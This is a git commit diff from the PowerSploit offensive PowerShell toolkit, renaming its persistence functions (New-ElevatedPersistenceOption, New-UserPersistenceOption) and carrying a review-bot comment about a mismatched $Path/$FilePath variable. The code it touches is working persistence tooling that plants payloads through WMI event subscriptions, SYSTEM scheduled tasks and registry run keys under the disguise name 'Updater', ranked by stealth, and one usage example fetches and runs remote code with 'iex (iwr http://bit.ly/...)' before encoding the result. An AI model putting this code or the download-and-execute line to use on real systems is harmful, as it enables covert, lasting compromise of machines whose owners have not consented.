#31 Persistence module function nouns are now singular

The function names New-UserPersistenceOption and
New-ElevatedPersistenceOption now conform
to PowerShell naming best practices.
mattifestation 2014-02-23 10:31:24 -05:00
parent 28790b5a08
commit bbd382e52a
5 changed files with 42 additions and 42 deletions


@ -8,7 +8,7 @@ function Add-Persistence
PowerSploit Function: Add-Persistence PowerSploit Function: Add-Persistence
Author: Matthew Graeber (@mattifestation) Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: New-ElevatedPersistenceOptions, New-UserPersistenceOptions Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption
Optional Dependencies: None Optional Dependencies: None
.DESCRIPTION .DESCRIPTION
@ -23,15 +23,15 @@ function Add-Persistence
Specifies the path to your payload. Specifies the path to your payload.
.PARAMETER ElevatedPersistenceOptions .PARAMETER ElevatedPersistenceOption
Specifies the trigger for the persistent payload if the target is running elevated. Specifies the trigger for the persistent payload if the target is running elevated.
You must run New-ElevatedPersistenceOptions to generate this argument. You must run New-ElevatedPersistenceOption to generate this argument.
.PARAMETER UserPersistenceOptions .PARAMETER UserPersistenceOption
Specifies the trigger for the persistent payload if the target is not running elevated. Specifies the trigger for the persistent payload if the target is not running elevated.
You must run New-UserPersistenceOptions to generate this argument. You must run New-UserPersistenceOption to generate this argument.
.PARAMETER PersistenceScriptName .PARAMETER PersistenceScriptName
@ -71,9 +71,9 @@ function Add-Persistence
.EXAMPLE .EXAMPLE
C:\PS>$ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM' C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
C:\PS>$UserOptions = New-UserPersistenceOptions -Registry -AtLogon C:\PS>$UserOptions = New-UserPersistenceOption -Registry -AtLogon
C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -Verbose C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
Description Description
----------- -----------
@ -82,9 +82,9 @@ function Add-Persistence
.EXAMPLE .EXAMPLE
C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) } C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
C:\PS>$ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
C:\PS>$UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle C:\PS>$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
Description Description
----------- -----------
@ -108,10 +108,10 @@ function Add-Persistence
$FilePath, $FilePath,
[Parameter( Mandatory = $True )] [Parameter( Mandatory = $True )]
$ElevatedPersistenceOptions, $ElevatedPersistenceOption,
[Parameter( Mandatory = $True )] [Parameter( Mandatory = $True )]
$UserPersistenceOptions, $UserPersistenceOption,
[ValidateNotNullOrEmpty()] [ValidateNotNullOrEmpty()]
[String] [String]
@ -136,12 +136,12 @@ function Add-Persistence
#region Validate arguments #region Validate arguments
if ($ElevatedPersistenceOptions.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOptions') if ($ElevatedPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOption')
{ {
throw 'You provided invalid elevated persistence options.' throw 'You provided invalid elevated persistence options.'
} }
if ($UserPersistenceOptions.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOptions') if ($UserPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOption')
{ {
throw 'You provided invalid user-level persistence options.' throw 'You provided invalid user-level persistence options.'
} }
@ -171,9 +171,9 @@ function Add-Persistence
$RemovalScriptFile = "$($Path)\$($Leaf)" $RemovalScriptFile = "$($Path)\$($Leaf)"
} }
if ($PSBoundParameters['Path']) if ($PSBoundParameters['FilePath'])
{ {
Get-ChildItem $Path -ErrorAction Stop | Out-Null Get-ChildItem $FilePath -ErrorAction Stop
$Script = [IO.File]::ReadAllText((Resolve-Path $Path)) $Script = [IO.File]::ReadAllText((Resolve-Path $Path))
} }
else else
@ -216,7 +216,7 @@ function Add-Persistence
#region Process persistence options #region Process persistence options
# Begin processing elevated persistence options # Begin processing elevated persistence options
switch ($ElevatedPersistenceOptions.Method) switch ($ElevatedPersistenceOption.Method)
{ {
'PermanentWMI' 'PermanentWMI'
{ {
@ -226,7 +226,7 @@ Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "nam
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match 'Updater'} | Remove-WmiObject Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match 'Updater'} | Remove-WmiObject
} }
switch ($ElevatedPersistenceOptions.Trigger) switch ($ElevatedPersistenceOption.Trigger)
{ {
'AtStartup' 'AtStartup'
{ {
@ -235,7 +235,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
'Daily' 'Daily'
{ {
$ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOptions.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOptions.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`"" $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOption.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOption.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`""
} }
default default
@ -250,7 +250,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
$CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"' $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"'
$ElevatedTriggerRemoval = "schtasks /Delete /TN Updater" $ElevatedTriggerRemoval = "schtasks /Delete /TN Updater"
switch ($ElevatedPersistenceOptions.Trigger) switch ($ElevatedPersistenceOption.Trigger)
{ {
'AtLogon' 'AtLogon'
{ {
@ -259,7 +259,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
'Daily' 'Daily'
{ {
$ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOptions.Time.ToString('HH:mm:ss')) /TN Updater /TR " $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "
} }
'OnIdle' 'OnIdle'
@ -291,18 +291,18 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
} }
# Begin processing user-level persistence options # Begin processing user-level persistence options
switch ($UserPersistenceOptions.Method) switch ($UserPersistenceOption.Method)
{ {
'ScheduledTask' 'ScheduledTask'
{ {
$CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"' $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"'
$UserTriggerRemoval = "schtasks /Delete /TN Updater" $UserTriggerRemoval = "schtasks /Delete /TN Updater"
switch ($UserPersistenceOptions.Trigger) switch ($UserPersistenceOption.Trigger)
{ {
'Daily' 'Daily'
{ {
$UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOptions.Time.ToString('HH:mm:ss')) /TN Updater /TR " $UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "
} }
'OnIdle' 'OnIdle'
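Review bot: In the `@ -171,9 +171,9` hunk the new code tests `$PSBoundParameters['FilePath']` and lists `$FilePath`, but the following line still reads the script through `Resolve-Path $Path`, so the file that is checked and the file that is read are named by different variables. `$Path` also appears in the context line that builds `$RemovalScriptFile`, which suggests it holds a different value; the read should use the same parameter, `$Script = [IO.File]::ReadAllText((Resolve-Path $FilePath))`. The same hunk drops `| Out-Null` from the existence check, so the `Get-ChildItem` result would presumably land on the function's output stream; `Get-ChildItem $FilePath -ErrorAction Stop | Out-Null` keeps it out. Neither change is a noun rename, so the commit message does not cover them and they would be easier to audit as a separate commit. The body of Add-Persistence starts and ends outside this hunk.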


@ -1,11 +1,11 @@
function New-ElevatedPersistenceOptions function New-ElevatedPersistenceOption
{ {
<# <#
.SYNOPSIS .SYNOPSIS
Configure elevated persistence options for the Add-Persistence function. Configure elevated persistence options for the Add-Persistence function.
PowerSploit Function: New-ElevatedPersistenceOptions PowerSploit Function: New-ElevatedPersistenceOption
Author: Matthew Graeber (@mattifestation) Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
@ -13,7 +13,7 @@ function New-ElevatedPersistenceOptions
.DESCRIPTION .DESCRIPTION
New-ElevatedPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
.PARAMETER PermanentWMI .PARAMETER PermanentWMI
@ -61,15 +61,15 @@ function New-ElevatedPersistenceOptions
.EXAMPLE .EXAMPLE
C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM' C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
.EXAMPLE .EXAMPLE
C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -Registry -AtStartup C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
.EXAMPLE .EXAMPLE
C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
.LINK .LINK
@ -164,7 +164,7 @@ function New-ElevatedPersistenceOptions
} }
$PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable
$PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOptions' $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOption'
Write-Output $PersistenceOptions Write-Output $PersistenceOptions
} }


@ -1,11 +1,11 @@
function New-UserPersistenceOptions function New-UserPersistenceOption
{ {
<# <#
.SYNOPSIS .SYNOPSIS
Configure user-level persistence options for the Add-Persistence function. Configure user-level persistence options for the Add-Persistence function.
PowerSploit Function: New-UserPersistenceOptions PowerSploit Function: New-UserPersistenceOption
Author: Matthew Graeber (@mattifestation) Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
@ -13,7 +13,7 @@ function New-UserPersistenceOptions
.DESCRIPTION .DESCRIPTION
New-UserPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry. New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry.
.PARAMETER ScheduledTask .PARAMETER ScheduledTask
@ -49,11 +49,11 @@ function New-UserPersistenceOptions
.EXAMPLE .EXAMPLE
C:\PS> $UserOptions = New-UserPersistenceOptions -Registry -AtLogon C:\PS> $UserOptions = New-UserPersistenceOption -Registry -AtLogon
.EXAMPLE .EXAMPLE
C:\PS> $UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle C:\PS> $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
.LINK .LINK
@ -122,7 +122,7 @@ function New-UserPersistenceOptions
} }
$PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable
$PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOptions' $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOption'
Write-Output $PersistenceOptions Write-Output $PersistenceOptions
} }


@ -31,7 +31,7 @@ CmdletsToExport = '*'
ModuleList = @(@{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}) ModuleList = @(@{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'})
# List of all files packaged with this module # List of all files packaged with this module
FileList = 'Persistence.psm1', 'Persistence.psd1', 'Add-Persistence.ps1', 'New-ElevatedPersistenceOptions.ps1', FileList = 'Persistence.psm1', 'Persistence.psd1', 'Add-Persistence.ps1', 'New-ElevatedPersistenceOption.ps1',
'New-UserPersistenceOptions.ps1', 'Usage.md' 'New-UserPersistenceOption.ps1', 'Usage.md'
} }


@ -48,11 +48,11 @@ Strips comments and extra whitespace from a script.
**Add persistence capabilities to a PowerShell script** **Add persistence capabilities to a PowerShell script**
#### `New-UserPersistenceOptions` #### `New-UserPersistenceOption`
Configure user-level persistence options for the Add-Persistence function. Configure user-level persistence options for the Add-Persistence function.
#### `New-ElevatedPersistenceOptions` #### `New-ElevatedPersistenceOption`
Configure elevated persistence options for the Add-Persistence function. Configure elevated persistence options for the Add-Persistence function.